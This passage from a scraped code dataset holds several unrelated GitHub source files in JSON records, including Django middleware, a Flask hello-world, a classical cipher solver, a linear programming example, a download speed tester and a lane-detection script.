config.figs_save_location)\n","repo_name":"adrian-pace/FROG-analytics","sub_path":"analytics/main_stian_logs.py","file_name":"main_stian_logs.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37509990836","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"stock-trading-backend\",\n version=\"0.0.1\",\n author=\"Igor Ryzhkov\",\n author_email=\"igor.o.ryzhkov@gmail.com\",\n description=\"Back-end for stock trading with reinforcement learning.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/iryzhkov/stock-trading-backend\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Environment :: Console\",\n \"Environment :: Web Environment\",\n \"Framework :: Flask\",\n \"Framework :: Pytest\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Education\",\n \"Intended Audience :: Science/Research\",\n \"License :: MIT License\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Office/Business :: Financial :: Investment\",\n \"Topic :: Office/Business :: Financial\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n python_requires='>=3.7',\n)\n","repo_name":"iryzhkov/stock-trading-backend","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32060911463","text":"#! /usr/bin/python3\n#-*- coding: utf-8-*-\n#\n# Escola del Treball 2020-21\n# M03 Programacio\n# Programes amb while\n# Exercici1\n# Cristian Fernando Condolo Jimenez\n# 16/11/2020\n# \n# Descripcion:\n# Escribir los multiplos de dos menors o iguals a 100\n#\n# E.E.\n\n# Programa\n# leer los datos\nmultiplo = 1\n\n# bucle: mostrar los multiplos de 2\nwhile multiplo <= 100:\n # buscar los multiplos de 2\n if multiplo % 2 == 0:\n print(multiplo)\n multiplo = multiplo + 1 ","repo_name":"KeshiKiD03/Python-ipc","sub_path":"Apuntes/Apuntes Christian/Programacio/UF1/Programes amb while/Exercici1.py","file_name":"Exercici1.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27029627097","text":"import re\nimport time\nimport logging\n\nfrom django.http import HttpResponseRedirect\nfrom django.utils.deprecation import MiddlewareMixin\n\nfrom carts.models import ShoppingCart\nfrom user.models import User\n\n\nclass LoginStatusMiddleware(MiddlewareMixin):\n\n def process_request(self, request):\n\n user_id = request.session.get('user_id')\n if user_id:\n user = User.objects.filter(pk=user_id).first()\n request.user = user\n # if request.path == '/':\n # return None\n not_need_path = ['/user/login/', '/media/','/user/register',\n '/goods/','/carts/check_inventory/','/static/',\n '/carts/cart/','/carts/add_cart/',\n '/carts/show_cart_count/','/carts/change_cart/','/order/make_order/',]\n path = request.path\n for not_path in not_need_path:\n # 匹配当前路径是否为不需要登录验证的路径\n if re.match(not_path, path):\n return None\n # 当前的请求url不在not_need_path中,则表示当前url需要登录才能访问\n\n user_id = request.session.get('user_id')\n if user_id:\n try:\n user = User.objects.get(pk=user_id)\n request.user = user\n return None\n except:\n return HttpResponseRedirect('/user/login/')\n else:\n return HttpResponseRedirect('/user/login/')\n\n def process_response(self, request, response):\n\n return response\n\n\nlog = logging.getLogger(__name__)\n\n\nclass LogMiddleware(MiddlewareMixin):\n\n def process_request(self, request):\n # 绑定在request上的一个属性\n request.init_time = time.time()\n\n def process_response(self, request, response):\n # 请求时间\n count_time = time.time() - request.init_time\n # 请求状态码\n code = response.status_code\n # 请求地址\n path = request.path\n # 请求方法\n method = request.method\n # 响应内容\n try:\n content = response.content\n except:\n content = response.streaming_content\n log_str = '%s %s %s %s %s' % (count_time, code, path, method, content)\n log.info(log_str)\n return response\n\nclass SessionSyncMiddleware(MiddlewareMixin):\n\n\n def process_response(self, request,response):\n\n user_id = request.session.get('user_id')\n if user_id:\n session_goods = request.session.get('goods')\n if session_goods:\n # 判断session数据是否存在数据库中\n shop_carts = ShoppingCart.objects.filter(user_id=user_id)\n data = []\n # 标识符flag,修改了商品信息\n for goods in shop_carts:\n for se_goods in session_goods:\n if se_goods[0] == goods.goods_id:\n goods.nums = se_goods[1]\n goods.is_select = se_goods[2]\n goods.save()\n # 向data中添加更新了的商品\n data.append(se_goods[0])\n session_goods_ids = [i[0] for i in session_goods]\n add_goods_ids = list(set(session_goods_ids) - set(data))\n for add_goods_id in add_goods_ids:\n for session_good in session_goods:\n if add_goods_id == session_good[0]:\n ShoppingCart.objects.create(user_id=user_id,goods_id=add_goods_id,nums=session_good[1])\n # 将数据库数据同步到session中\n new_shop_carts = ShoppingCart.objects.filter(user_id=user_id)\n session_new_goods = [[i.goods_id,i.nums,i.is_select] for i in new_shop_carts]\n request.session['goods'] = session_new_goods\n return response","repo_name":"dragonsea666/shop","sub_path":"fresh_shop/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42346672618","text":"import itertools\n\nkey = []\ncipher = \"ouauuuoooeeaaiaeauieuooeeiea\"\nfor i in itertools.permutations('aeiou', 5):\n key.append(''.join(i))\nfor each in key:\n temp_cipher = \"\"\n result = \"\"\n for temp in cipher:\n temp_cipher += str(each.index(temp))\n#这里其实是将字母的表换成数字的表以便后续计算\n for i in range(0, len(temp_cipher), 2):\n current_ascii = int(temp_cipher[i])*5+int(temp_cipher[i+1])+97\n#因为棋盘密码是采用两位一起表示一个字母\n if current_ascii > ord('i'):\n current_ascii += 1\n result += chr(current_ascii)\n if \"flag\" in result:\n print(each, result)","repo_name":"chrisyy2003/CryptoTools","sub_path":"Classical Cryptography/Polybius/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"27478200649","text":"\nimport socket\nimport datetime\nimport time\nimport os\n\nimport urllib\nimport urllib2\n#import requests\n\n\n\nssil='http://clck.yandex.ru/redir/dtype=stred/pid=2787/cid=1849/path=soft/*https://download.yandex.ru/element/opera/YandexElement.exe'\nperiod=10 #min\nfilename='C:\\test_skorost\\test.zip'\n\nnumb=1\npr=''\nf=open('log.txt','a')\n\ndt = datetime.datetime.now() \ntm=dt.strftime(' %H:%M:%S %d-%m-%Y')\n \n#f.write('start at '+tm+'\\n')\nprint ('start')\n\nwhile 1:\n while (1):\n dt = datetime.datetime.now() \n tm=dt.strftime('%M')\n if pr!=tm and int(tm)%period==0:\n pr=tm\n break\n time.sleep(60*period/12)\n\n \n dt = datetime.datetime.now() \n tm=dt.strftime(' %H:%M:%S %d-%m-%Y')\n f.write('test number; '+str(numb) +';'+tm+':')\n # print ('start test number: ', numb,tm)\n \n # print ('start test number: ', numb,tm,'') \n \n nach=time.time()\n try:\n \n urllib.urlretrieve(ssil, \"test.zip\")\n #download\n # time.sleep(1)\n except:\n kon=time.time()\n f.write(str(kon-nach)+'error \\n')\n print ('end test ', kon-nach,'error','bit/sec')\n else:\n kon=time.time()\n # print (os.stat(\"test.zip\").st_size)\n # print(len(open(\"test.zip\").read()))\n # folder_size=len(open(\"test.zip\").read())\n folder_size=os.stat(\"test.zip\").st_size\n dt = datetime.datetime.now() \n tm=dt.strftime(' %H:%M:%S %d-%m-%Y')\n f.write(tm+';'+str(8*folder_size/(kon-nach)/1024/1024)+';Mbit/sec\\n')\n f.flush()\n print (tm, 8*folder_size/(kon-nach)/1024/1024,'Mbit/sec')\n numb+=1\n\n\nf.close()\nprint ('end')\n\n\n","repo_name":"slawer/test_skorost","sub_path":"skor.py","file_name":"skor.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12819086087","text":"import heapq\n\nclass Solution:\n def kClosest(self, points, k):\n heap = []\n\n for x, y in points:\n distance = pow(x, 2) + pow(y, 2)\n heapq.heappush(heap, [distance, [x,y]])\n\n results = []\n for _ in range(k):\n results.append(heapq.heappop(heap)[1])\n\n return results\n\n\ns = Solution()\n# points = [[1,3],[-2,2]]\npoints = [[3,3], [5,-1], [-2,4]]\nk = 2\ns.kClosest(points, k)","repo_name":"galid1/Algorithm","sub_path":"python/leetcode/sort/973. K Closest Points to Origin.py","file_name":"973. K Closest Points to Origin.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"739985322","text":"# %%\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pulp import LpMaximize, LpProblem, LpVariable\n\n# Create the LP problem\nproblem = LpProblem(\"BranchAndBound\", LpMaximize)\n\n# Define the variables as integers\nx1 = LpVariable(\"x1\", lowBound=0, cat=\"Integer\")\nx2 = LpVariable(\"x2\", lowBound=0, cat=\"Integer\")\n\n# Define the objective function\nproblem += 5 * x1 + 6 * x2, \"Objective\"\n\n# Define the constraints\nproblem += x1 + x2 <= 50, \"Constraint 1\"\nproblem += 4 * x1 + 7 * x2 <= 280, \"Constraint 2\"\n\n# Solve the problem\nproblem.solve()\n\n# Print the results\nprint(\"Status:\", problem.status)\nprint(\"x1 =\", x1.varValue)\nprint(\"x2 =\", x2.varValue)\nprint(\"Maximized Z =\", 5 * x1.varValue + 6 * x2.varValue)\n\n# %%\n\"\"\"\nPlot the feasible region\nx_{1}+x_{2}<= 50\n4x_{1}+7x_{2}<= 280\nx_{1},x_{2}>=0\n\"\"\"\n\n# Define the inequalities as equations\n# x1 + x2 <= 50\n# 4x1 + 7x2 <= 280\n\n# Create a range of values for x1\nx1 = np.linspace(0, 100, 400) # Adjust the range as needed\n\n# Calculate x2 for the first inequality\nx2_1 = 50 - x1\n\n# Calculate x2 for the second inequality\nx2_2 = (280 - 4*x1) / 7\n\n# Plot the lines corresponding to the inequalities\nplt.plot(x1, x2_1, label='x1 + x2 <= 50')\nplt.plot(x1, x2_2, label='4x1 + 7x2 <= 280')\nplt.plot(24, 26, marker='o', fillstyle='none',\n label='Optimal Solution by BnB Method')\n\n# Add dashed lines for the additional equations\nplt.plot(x1, 26 * np.ones_like(x1), 'r--', label='x2 ≤ 26')\nplt.plot(x1, 27 * np.ones_like(x1), 'g--', label='x2 ≥ 27')\nplt.plot(22 * np.ones_like(x1), x1, 'b--', label='x1 ≤ 22')\nplt.plot(23 * np.ones_like(x1), x1, 'm--', label='x1 ≥ 23')\n\n# Fill the feasible region\nplt.fill_between(x1, 0, np.minimum(x2_1, x2_2), where=(x2_1 >= 0) & (\n x2_2 >= 0), color='gray', alpha=0.5, label='Feasible Region')\n\n# Add labels and legend\nplt.xlabel('x1')\nplt.ylabel('x2')\nplt.xlim(0, 55)\nplt.ylim(0, 55)\nplt.legend()\nplt.grid(True)\n\n# Show the plot\nplt.show()\n","repo_name":"prats3992/CVRPTW","sub_path":"MILP/milp_bnb.py","file_name":"milp_bnb.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4687802333","text":"from core import admin\nfrom core import student\nfrom core import teacher\n\nfunc_dict = {\n '1':admin.admin_view,\n '2':student.student_view,\n '3':teacher.teacher_view\n}\n\ndef run():\n while True:\n print(\n '''\n === 欢迎来到选课系统 ===\n 1. 管理员功能\n 2. 学生功能\n 3. 老师功能\n === end ===\n '''\n )\n\n choice = input('请选择你想要进入的功能选项 >>> : ').strip()\n if choice not in func_dict:\n print('没有此选项,请重新选择')\n continue\n func_dict[choice]()","repo_name":"Zheng-yuhao/Online_Courses_Selecting_System","sub_path":"core/src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24474237385","text":"from django.conf import settings\nfrom blockchain_wrapper import Blockchain\nimport csv\n\ndata_dir = settings.DATA_DIR\ncsv_dir = data_dir + \"/CSV/\"\n\n# Most recent difficulty levels 413280, 411264, 409248, 407232\n\nclass CSV(object):\n\n @staticmethod\n def write_block(block):\n txs = Blockchain.get_transactions_by_block(block)\n file_name = csv_dir + str(block) + \".csv\"\n with open(file_name, 'wb') as csvfile:\n data_writer = csv.writer(csvfile)\n\n for tx in txs:\n list = [tx.block_height, tx.hash, tx.time, tx.mempool_count, tx.mempool_size, tx.fee, tx.size, tx.fee_per_byte, tx.confirmation_time]\n data_writer.writerow(list)\n\n @staticmethod\n def write_difficulty(start_block=407232, count=1):\n end_block = start_block + 2016*4\n\n errors = []\n for i in range(start_block, end_block):\n print(str(start_block) + \":\" + str(i) + \":\" + str(end_block))\n try:\n CSV.write_block(i)\n except:\n print(\"Errored: \" + str(i))\n errors.append(i)\n return errors\n\n @staticmethod\n def write_blocks(block_list):\n errors = []\n for block in block_list:\n try:\n CSV.write_block(block)\n except:\n print(\"Errored: \" + str(block))\n errors.append(block)\n return errors\n\n\n\n","repo_name":"suryarastogi/ImperialProjects","sub_path":"Final Project/BitcoinVizBackend/API/csv_writer.py","file_name":"csv_writer.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19115577071","text":"from flask import Flask\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello_world():\n res = \"Hello Word! \\n Welcome Aspring Developer :) \\n Let's Start our Journey of Learing Flask With Python\"\n return res\n\n@app.route(\"/greet/\")\ndef greetings(name):\n message=\"Hello, \"+ name + \"!\"\n return message\n\n@app.route(\"/farewell/\")\ndef farewell(name):\n message = \"Goodbye, \" + name + \"!\"\n return message\n\nif __name__ == \"__main__\":\n app.run(host =\"127.0.0.1\", port = 4500, debug=True)\n","repo_name":"code0403/PromptEngineering","sub_path":"Flask/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10444542388","text":"from django.db import models\n\nfrom apps.deadlines.models import DeadlineItem, LinkedDeadline, LinkedDeadlineFlag\nfrom apps.visums.models import LinkedSubCategory, LinkedCheck\n\nfrom scouts_auth.inuits.models import AbstractBaseModel\nfrom scouts_auth.inuits.models.fields import OptionalCharField\n\n\n# LOGGING\nimport logging\nfrom scouts_auth.inuits.logging import InuitsLogger\n\nlogger: InuitsLogger = logging.getLogger(__name__)\n\n\nclass LinkedDeadlineItem(AbstractBaseModel):\n\n parent = models.ForeignKey(\n DeadlineItem, on_delete=models.CASCADE, related_name=\"deadline_item\"\n )\n\n linked_deadline = models.ForeignKey(\n LinkedDeadline,\n on_delete=models.CASCADE,\n related_name=\"items\",\n null=True,\n blank=True,\n )\n\n linked_sub_category = models.ForeignKey(\n LinkedSubCategory,\n on_delete=models.CASCADE,\n related_name=\"deadline_items\",\n null=True,\n blank=True,\n )\n linked_check = models.ForeignKey(\n LinkedCheck,\n on_delete=models.CASCADE,\n related_name=\"deadline_items\",\n null=True,\n blank=True,\n )\n flag = models.OneToOneField(\n LinkedDeadlineFlag,\n on_delete=models.CASCADE,\n related_name=\"deadline_item\",\n null=True,\n blank=True,\n )\n\n class Meta:\n ordering = [\"parent__index\"]\n\n @property\n def name(self) -> str:\n if self.is_deadline():\n return self.flag.parent.name\n\n if self.is_sub_category_deadline():\n return self.linked_sub_category.parent.name\n\n if self.is_check_deadline():\n return self.linked_check.parent.name\n\n def is_deadline(self):\n return self.parent.is_deadline()\n\n def is_sub_category_deadline(self):\n return self.parent.is_sub_category_deadline()\n\n def is_check_deadline(self):\n return self.parent.is_check_deadline()\n\n def is_checked(self) -> bool:\n if self.is_deadline():\n return self.flag.flag\n\n if self.is_sub_category_deadline():\n return self.linked_sub_category.is_checked()\n\n if self.is_check_deadline():\n return self.linked_check.get_value_type().is_checked()\n","repo_name":"ScoutsGidsenVL/kampvisum-backend","sub_path":"scouts_kampvisum_api/apps/deadlines/models/linked_deadline_item.py","file_name":"linked_deadline_item.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12441748854","text":"#encoding:utf-8\r\nimport pymongo\r\n\r\nimport urllib2,urllib,redis,datetime\r\nimport json, marshal,time,bson,re, gridfs\r\nimport time,datetime\r\nfrom bson.objectid import ObjectId\r\n \r\ndef car_tag(car_brand,car_series):\r\n return \"\"\r\n\r\ncolors={u\"蝴蝶紫\":u\"紫色\",u\"珠光黑\":u\"黑色\",u\"紫红\":u\"紫色\",u\"黑曜珍珠黑\":u\"黑色\",u\"紫\":u\"紫色\",\r\n u\"桔\":u\"橙色\",u\"黑\":u\"黑色\",u\"藏蓝\":u\"蓝色(兰)\",u\"德兰黑\":u\"黑色\",u\"金色\":u\"香槟色\",\r\n u\"栗色\":u\"咖啡色\",u\"暗樱红色\":u\"红色\",u\"沙黄色\":u\"香槟色\",u\"各种颜色\":u\"其它\",u\"北极白\":u\"白色\",\r\n u\"幻红\":u\"红色\",u\"奶黄\":u\"黄色\",u\"黄\":u\"黄色\",u\"纯白\":u\"白色\",u\"枣红\":u\"红色\",u\"铁灰\":u\"灰色\",\r\n u\"青蓝\":u\"蓝色(兰)\",u\"深蓝\":u\"蓝色(兰)\",u\"新波多尔红\":u\"红色\",u\"臻栗色\":u\"咖啡色\",u\"酷银\":u\"银色\",\r\n u\"墨绿\":u\"绿色\",u\"橙\":u\"橙色\",u\"米黄\":u\"黄色\",u\"橘\":u\"橙色\",u\"钛灰\":u\"灰色\",u\"马赛灰\":u\"灰色\",\r\n u\"水蓝\":u\"蓝色(兰)\",u\"五彩\":u\"其它\",u\"太空黑\":u\"黑色\",u\"雅典银\":u\"银色\",u\"咖啡\":u\"咖啡色\",\r\n u\"梅红色\":u\"红色\",u\"乳白色\":u\"白色\",u\"太子灰\":u\"灰色\",u\"冰蓝色\":u\"蓝色(兰)\",u\"晶灰色\":u\"灰色\",\r\n u\"金米色\":u\"香槟色\",u\"栗\":u\"咖啡色\",u\"亮银色\":u\"银色\",u\"沙滩金\":u\"香槟色\",u\"湖蓝\":u\"蓝色(兰)\",\r\n u\"酱紫\":u\"紫色\",u\"珍珠绸缎白\":u\"白色\",u\"沙黄\":u\"黄色\",u\"草绿\":u\"绿色\",u\"宝石蓝\":u\"蓝色(兰)\",\r\n u\"米\":u\"白色\",u\"驼色\":u\"咖啡色\",u\"橙红色\":u\"橙色\",u\"映灰色\":u\"灰色\",u\"爱琴海蓝\":u\"蓝色(兰)\",\r\n u\"暗红\":u\"红色\",u\"水晶银\":u\"银色\",u\"蓝灰\":u\"灰色\",u\"蓝黑色\":u\"蓝色(兰)\",u\"解放蓝\":u\"蓝色(兰)\",\r\n u\"淡蓝\":u\"蓝色(兰)\",u\"香槟色\":u\"香槟色\",u\"琥珀金\":u\"香槟色\",u\"巴赫蓝\":u\"蓝��(兰)\",u\"珠白\":u\"白色\",\r\n u\"深灰色\":u\"灰色\",u\"浅香槟\":u\"香槟色\",u\"浅蓝\":u\"蓝色(兰)\",u\"蔚蓝\":u\"蓝色(兰)\",u\"紫蓝\":u\"紫色\",\r\n u\"曜石黑\":u\"黑色\",u\"浅绿色\":u\"绿色\",u\"经典红\":u\"红色\",u\"深红\":u\"红色\",u\"朱红\":u\"红色\",u\"浅黄色\":u\"黄色\",\r\n u\"黑蓝色\":u\"蓝色(兰)\",u\"香槟\":u\"香槟色\",u\"银白\":u\"银色\",u\"白灰\":u\"灰色\",u\"紫罗兰\":u\"紫色\",\r\n u\"墨橘色\":u\"橙色\",u\"古铜色\":u\"咖啡色\",u\"珍珠白\":u\"白色\",u\"巧克力色\":u\"咖啡色\",u\"蓝色\":u\"蓝色(兰)\",\r\n u\"棕\":u\"咖啡色\",u\"灰\":u\"灰色\",u\"灰绿\":u\"绿色\",u\"蓝\":u\"蓝色(兰)\",u\"香槟金\":u\"香槟色\",u\"深绿\":u\"绿色\",\r\n u\"银\":u\"银色\",u\"褐\":u\"咖啡色\",u\"深海蓝\":u\"蓝色(兰)\",u\"银灰色\":u\"灰色\",u\"钛银\":u\"银色\",\r\n u\"宝蓝\":u\"蓝色(兰)\",u\"军绿\":u\"绿色\",u\"桔黄\":u\"橙色\",u\"奶白色\":u\"白色\",u\"淡绿\":u\"绿色\",u\"浅紫\":u\"紫色\",\r\n u\"炫幻蓝\":u\"蓝色(兰)\",u\"翠绿\":u\"绿色\",u\"浅紫灰\":u\"灰色\",u\"拉力蓝\":u\"蓝色(兰)\",u\"紫晶檀\":u\"紫色\",\r\n u\"灰色\":u\"灰色\",u\"铜\":u\"咖啡色\",u\"红\":u\"红色\",u\"土黄色\":u\"黄色\",u\"香槟银\":u\"银色\",u\"浅金\":u\"香槟色\",\r\n u\"橘黄\":u\"橙色\",u\"玫瑰红\":u\"红色\",u\"粉\":u\"其它\",u\"深紫\":u\"紫色\",u\"米色\":u\"白色\",u\"法兰红\":u\"红色\",\r\n u\"珠光海洋蓝\":u\"蓝色(兰)\",u\"不限\":u\"其它\",u\"其他颜色\":u\"其它\",u\"卡其色\":u\"咖啡色\",u\"浅红\":u\"红色\",\r\n u\"深灰\":u\"灰色\",u\"天蓝\":u\"蓝色(兰)\",u\"棕色\":u\"咖啡色\",u\"黑灰色\":u\"灰色\",u\"金属灰\":u\"灰色\",\r\n u\"金属色\":u\"香槟色\",u\"深褐\":u\"咖啡色\",u\"青灰\":u\"灰色\",u\"中黄\":u\"黄色\",u\"米白色\":u\"白色\",u\"棕红\":u\"咖啡色\",\r\n u\"巧克力\":u\"咖啡色\",u\"酒红色\":u\"红色\",u\"橘红\":u\"橙色\",u\"金黄\":u\"香槟色\",u\"淡黄\":u\"黄色\",u\"粉红\":u\"其它\",\r\n u\"褐色\":u\"咖啡色\",u\"墨色\":u\"黑色\",u\"海洋蓝\":u\"蓝色(兰)\",u\"冰海蓝\":u\"蓝色(兰)\",u\"驼\":u\"咖啡色\",\r\n u\"金\":u\"香槟色\",u\"深灰绿\":u\"绿色\",u\"玫红色\":u\"红色\",u\"绿\":u\"绿色\",u\"珍珠银\":u\"银色\",u\"卡其\":u\"咖啡色\",\r\n u\"白\":u\"白色\",u\"炭灰\":u\"灰色\",u\"黄绿色\":u\"绿色\",u\"橘红色\":u\"橙色\",u\"钛金色\":u\"香槟色\",u\"绚彩橙\":u\"橙色\",\r\n u\"浅灰\":u\"灰色\",u\"橙红\":u\"橙色\",u\"富贵蓝\":u\"蓝色(兰)\",u\"沙金色\":u\"香槟色\",u\"醇魅红色\":u\"红色\",\r\n u\"恒金色\":u\"香槟色\"}\r\n\r\ndef car_outer_color(outer_color):\r\n if outer_color is None or outer_color==\"\":\r\n return u\"其它\"\r\n for key in colors.keys():\r\n if outer_color.find(key)>=0:\r\n return colors[key]\r\n return u\"其它\"\r\n\r\ninner_colors={u\"深\":u\"深色\",u\"浅\":u\"浅色\"}\r\ndef car_inner_color(inner_color):\r\n if inner_color is None or inner_color==\"\":\r\n return u\"不详\"\r\n for key in inner_colors.keys():\r\n if inner_color.find(key)>=0:\r\n return inner_colors[key]\r\n return u\"不详\"\r\n\r\n\r\nstyles={u\"轿车\":u\"轿车\",u\"面包\":u\"面包车\",u\"货\":u\"货车/客车\",u\"客\":u\"货车/客车\",\r\n u\"越野\":u\"SUV/CUV\",u\"SUV\":u\"SUV/CUV\",u\"CUV\":u\"SUV/CUV\",u\"商务\":u\"MPV\",\r\n u\"MPV\":u\"MPV\",u\"跑车\":u\"跑车\",u\"皮卡\":u\"皮卡\",u\"中型\":u\"中/中大型车\",\r\n u\"中大型\":u\"中/中大型车\",u\"小轿\":u\"小型车\",u\"小型\":u\"小型车\",\r\n u\"微型\":u\"紧凑/微型车\",u\"紧凑\":u\"紧凑/微型车\",u\"豪华\":u\"豪华车\",u\"SV\":u\"SUV/CUV\"}\r\n\r\ndef car_style(style,type):\r\n if (style is None or style==\"\") and (type is None or type==\"\"):\r\n return u\"其它\"\r\n# print style,type\r\n for key in styles.keys():\r\n if style.find(key)>=0:\r\n return styles[key]\r\n elif type.find(key)>=0:\r\n return styles[key]\r\n \r\n return u\"其它\"\r\n","repo_name":"hw20686832/worker_queue","sub_path":"lib/Arrange44.py","file_name":"Arrange44.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32196197031","text":"from pico2d import *\r\nimport math\r\nopen_canvas()\r\n\r\ngrass=load_image('grass.png')\r\ncharacter=load_image('character.png')\r\n\r\nx=400\r\ny=90\r\nC=180\r\nr=20\r\nwhile(1):\r\n clear_canvas_now()\r\n grass.draw_now(400,30)\r\n x=-math.cos(C/360*math.pi)*200+400\r\n y=math.sin(C/360*math.pi)*200+290\r\n character.draw_now(x,y)\r\n C=C+10\r\n delay(0.1)\r\n\r\nclose_canvas()\r\n","repo_name":"test2019182015/2019182015_2DGP_DRILL","sub_path":"D6/move_circle.py","file_name":"move_circle.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23174214009","text":"import numpy as np\nimport glob\nimport cv2\nimport pickle\nfrom moviepy.editor import VideoFileClip\nfrom image_generator import Line, abs_sobel_thresh, old_color_threshold, color_threshold, print_road_info\nfrom image_generator import blind_search, not_blind_search, draw_lines\n\n# Import pickle data\npickle_data = pickle.load(open(\"./camera_cal/calibration_pickle.p\",\"rb\"))\nmtx = pickle_data[\"mtx\"]\ndist = pickle_data[\"dist\"]\n\n# Get data based on type of data requested\n#type_of_data = 'image' \t\t\t\t# To work on image data\ntype_of_data = 'video' \t\t\t# To work on video data\n\n#data = './test_images/test5.jpg'\t# Image source\ndata = 'project_video.mp4' \t\t\t# Video source \n\t\t\t\t\t\t\t\t\t#'project_video.mp4'\n\t\t\t\t\t\t\t\t\t#'challenge_video.mp4' \n\t\t\t\t\t\t\t\t\t#'harder_challenge_video.mp4'\n\n# Setup left and right lines\nleft_line = Line()\nright_line = Line()\n\n# Where all the magic happens\ndef process_frame(frame):\n\timg = frame\n\t#Undistort the frame\t\n\tundist = cv2.undistort(img, mtx, dist, None, mtx)\n\t\n\tfilteredImage = np.zeros_like(undist[:,:,0])\n\t# Apply Sobel filter on the image in x direction\t\n\tsobelx = abs_sobel_thresh(undist,orient = 'x', thresh_min = 50, thresh_max = 255)\n\tsobely = abs_sobel_thresh(undist,orient = 'y', thresh_min = 25, thresh_max = 255)\n\t\n\t# Apply color filter on the image\n\tc_binary = color_threshold(undist, r_thresh=(50,255), hlsthresh=(100,255), hsvthresh=(220,255))\n\t\n\t# Combine the filter results\n\tfilteredImage[((sobelx == 1) & (sobely == 1)) | (c_binary == 1)] = 255\n\t#cv2.imshow('Filtered Image',filteredImage)\n\t\n\t# Define perspective transform\n\timg_size = (img.shape[1],img.shape[0])\n\tbottom_width = 0.75\n\ttop_width = 0.10\n\theight = 0.63\n\tchop_bottom = 0.94\t\t\t# Chop the bottom portion of image that has the car hood\n\toffset = img.shape[1]*0.10 \t# Offset ratio controls the width between the lanes\n\t# Source Points\n\tsrc = np.float32([[(0.5*img.shape[1] - 0.5*top_width*img.shape[1]),height*img.shape[0]],\t# Point 1\n\t\t\t[(0.5*img.shape[1] + 0.5*top_width*img.shape[1]),height*img.shape[0]],\t# Point 2\n\t\t\t[(0.5*img.shape[1] - 0.5*bottom_width*img.shape[1]),chop_bottom*img.shape[0]],# Point 3\n\t\t\t[(0.5*img.shape[1] + 0.5*bottom_width*img.shape[1]),chop_bottom*img.shape[0]],# Point 4\t\t\n\t\t\t])\n\t\n\t# Destination Points\n\tdst = np.float32([[offset,0],[img.shape[1]-offset,0],[offset,img.shape[0]],[img.shape[1]-offset,img.shape[0]]])\n\t\n\t# Apply perspective transform\n\tM = cv2.getPerspectiveTransform(src,dst)\n\tMinv = cv2.getPerspectiveTransform(dst,src)\n\tbinary_warped = cv2.warpPerspective(filteredImage, M, img_size, flags=cv2.INTER_LINEAR)\n\t#cv2.imshow('Warped Image',binary_warped)\n\t\n\t# Search for L&R lines\t\t\n\tif left_line.detected == False:\n\t\tlines_img, curve_l, curve_r = blind_search(binary_warped, left_line, right_line)\n\telse:\n\t\tlines_img, curve_l, curve_r = not_blind_search(binary_warped, left_line, right_line)\n\t\n\t#cv2.imshow('Lines Image',lines_img)\n\t\t\n\t# Pass this info to the line class\n\tleft_line.radius_of_curvature = curve_l\n\tright_line.radius_of_curvature = curve_r\n\t\n\trecast_img = draw_lines(binary_warped, Minv, left_line, right_line)\n\t\n\t# Combine the recast_image with the undistorted image\n\tcombined = cv2.addWeighted(undist, 1, recast_img, 0.3, 0)\n\t\n\tresult = print_road_info(combined, left_line, right_line)\t\n\t#cv2.imshow('Recast Image',result)\n\t\n\treturn result\n\n# If type of data is images use this block of code\nif type_of_data == 'image':\n\tprint(\"Processing Image data\")\n\t# Read an image\n\timg = cv2.imread(data)\n\t\t\n\t#Undistort the image\t\n\tundist = cv2.undistort(img, mtx, dist, None, mtx)\n\t\n\tfilteredImage = np.zeros_like(undist[:,:,0])\n\t# Apply Sobel filter on the image in x direction\t\n\tsobelx = abs_sobel_thresh(undist,orient = 'x', thresh_min = 12, thresh_max = 255)\n\tsobely = abs_sobel_thresh(undist,orient = 'y', thresh_min = 25, thresh_max = 255)\n\t# Apply color filter on the image\n\tc_binary = color_threshold(undist, hlsthresh=(100,255), 